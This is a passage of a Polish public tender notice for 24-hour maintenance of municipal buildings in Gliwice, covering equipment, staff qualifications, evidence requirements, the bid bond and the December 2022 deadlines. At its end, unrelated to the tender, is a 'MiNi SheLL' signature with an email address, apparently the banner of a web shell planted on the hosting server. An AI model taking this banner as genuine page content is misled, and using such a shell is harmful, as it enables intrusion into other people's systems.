i pomiarów szczelności instalacji gazowych,<br/>•	minimum 2 urządzenia do kontroli i pomiarów instalacji elektrycznych,<br/>•	minimum 1 komplet rusztowań ramowych lub kolumnowych,<br/>•	minimum 1 agregat prądotwórczy,<br/>•	minimum 1 komplet zsypu budowlanego na gruz,<br/>•	hala magazynowa o powierzchni minimum 400m2, zlokalizowana na terenie Miasta Gliwice z możliwością dojazdu komunikacją miejską; posiadająca całodobową ochronę (wymagana obecność pracownika ochrony/dozoru/dyspozycji na miejscu przez okres 24 godzin),<br/>•	obiekt/biuro na terenie Miasta Gliwice z możliwością dojazdu komunikacją miejską, wyposażony w stacjonarną linię telefoniczną, który stanowić będzie miejsce pełnienia całodobowego pogotowia technicznego oraz przyjmowania telefonicznych i osobistych zgłoszeń (całodobowo) Zamawiającego lub najemców lokali. Biuro musi funkcjonować w dniu podpisania umowy. Niespełnienie tego warunku będzie traktowane jako niezgodność przedmiotu umowy z jej treścią i skutkować będzie naliczaniem kar umownych.<br/>Wykonawca jest zobowiązany załączyć do oferty listę ilościową wraz z opisem ww. elementów z podaniem sposobu dysponowania, adresem (hala, biuro), opisem technicznym, datą produkcji, nazwą producenta etc. Należy wskazać aktualne badania techniczne (pojazdy), aprobaty oraz aktualne terminy legalizacyjne (jeśli dotyczy) według wzoru który stanowi załącznik nr 5a do SWZ.<br/>Zamawiający zastrzega sobie prawo do dokonania przeglądu w całości lub części wskazanego sprzętu, wyposażenia i lokali (pod kątem zgodności z treścią oferty) wybranego Wykonawcy najpóźniej w dniu podpisania umowy. Niespełnienie warunku udostępnienia przez Wykonawcę środków do wglądu będzie traktowane jako zwłoka Wykonawcy w podpisaniu umowy. <br/>2.5.	Dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj. posiadającymi prawo do wykonywania samodzielnych funkcji technicznych w budownictwie zgodnie z poniższym wyszczególnieniem:<br/>W zakresie „dysponowania osobami zdolnymi do wykonania zamówienia”: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże iż osoby które będą uczestniczyć w postępowaniu (wpisane do wykazu osób uczestniczących w postępowaniu) będą pełniły odpowiednio funkcje:<br/>•	minimum 2 osoby do spraw administracyjno- rozliczeniowych, koordynacji i kontaktów z zamawiającym,<br/>•	minimum 4 osoby do pełnienia całodobowego pogotowia technicznego oraz przyjmowania telefonicznych i osobistych zgłoszeń o awariach,<br/>•	minimum 4 osoby posiadające uprawnienia do pełnienia samodzielnych funkcji w budownictwie, posiadających aktualne ubezpieczenie OC, w tym po min. 1 osobie w branży konstrukcyjno-budowlanej bez ograniczeń, w branży instalacyjnej (do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych), w branży elektrycznej (w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych); posiadające stosowne uprawnienia budowlane określone przepisami Prawa Budowlanego, a ponadto będące członkami właściwej izby samorządu zawodowego, zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. nr 5 z 2001 r., poz. 42) – należy dołączyć aktualne zaświadczenia,<br/>•	minimum 1 osoba posiadająca uprawniania w zakresie dozoru urządzeń, instalacji i sieci gazowych (G3/D),<br/>•	minimum 1 osoba posiadająca uprawniania w zakresie dozoru urządzeń, instalacji i sieci elektrycznych (G1/D),<br/>•	minimum 2 osoby posiadające uprawniania w zakresie eksploatacji urządzeń, instalacji i sieci gazowych (G3/E),<br/>•	minimum 2 osoby posiadające uprawniania w zakresie eksploatacji urządzeń, instalacji i sieci elektrycznych (G1/E),<br/>•	minimum 1 osoba posiadająca uprawnienia UDT do konserwacji dźwigów osobowych,<br/>•	minimum 6 osób do wykonywania robót dekarsko-blacharskich,<br/>•	minimum 2 osoby do wykonywania robót murarsko-tynkarskich,<br/>•	minimum 8 osób, w tym po 2 osoby do wykonywania odpowiednio robót stolarskich, szklarskich, malarskich i posadzkarskich. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.<br/>oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z<br/>2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o<br/>przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym<br/>załącznik nr 3 do<br/>SWZ;2.odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności<br/>Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące<br/>przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;2.2.1. Jeżeli wykonawca ma siedzibę<br/>lub miejsce<br/>zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa<br/>dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie<br/>otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie<br/>zawarł układu z<br/>wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego<br/>rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.2.2.2.<br/>Jeżeli w kraju, w<br/>którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której<br/>dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem<br/>zawierającym<br/>odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub<br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w<br/>którym wykonawca<br/>ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed<br/>organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego,<br/>właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania wykonawcy.2.2.3. Dokumenty/oświadczenia, o których<br/>mowa w pkt.<br/>2.2.1 i 2.2.2 powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania<br/>ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Dokumentu potwierdzającego<br/>ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem<br/>zamówienia na wymaganą sumę gwarancyjną.2.Wykazu usług wykonanych, a w przypadku świadczeń<br/>powtarzających<br/>się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy –<br/>w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>usługi zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez<br/>podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub<br/>ciągłych są<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje<br/>bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3<br/>miesięcy; spełniających wymagania określone w punkcie IV.2.4 SWZ.<br/>Wykaz narzędzi, wyposażenia oraz środków organizacyjno – technicznych,<br/>Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 10.000,00zł (słownie: dziesięć tysięcy złotych).<br/>2.	Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy PZP.<br/>3.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>4.1.	pieniądzu - przelewem na rachunek bankowy Zamawiającego ING Bank - oddział w Gliwicach 20 1050 1285 1000 0022 2649 4546 z adnotacją: „Wadium - postępowanie nr 201/PZ/2022/ZBM”.<br/>4.2.	gwarancjach bankowych,<br/>4.3.	gwarancjach ubezpieczeniowych,<br/>4.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz.U. z 2020 r., poz. 299). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane.3. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.4.Oświadczenia i dokumenty<br/>potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści<br/>wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we<br/>Wzorze umowy, stanowiącym załącznik nr 6 do SWZ. Zmiana umowy wymaga dla swej ważności,<br/>pod rygorem nieważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-12 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com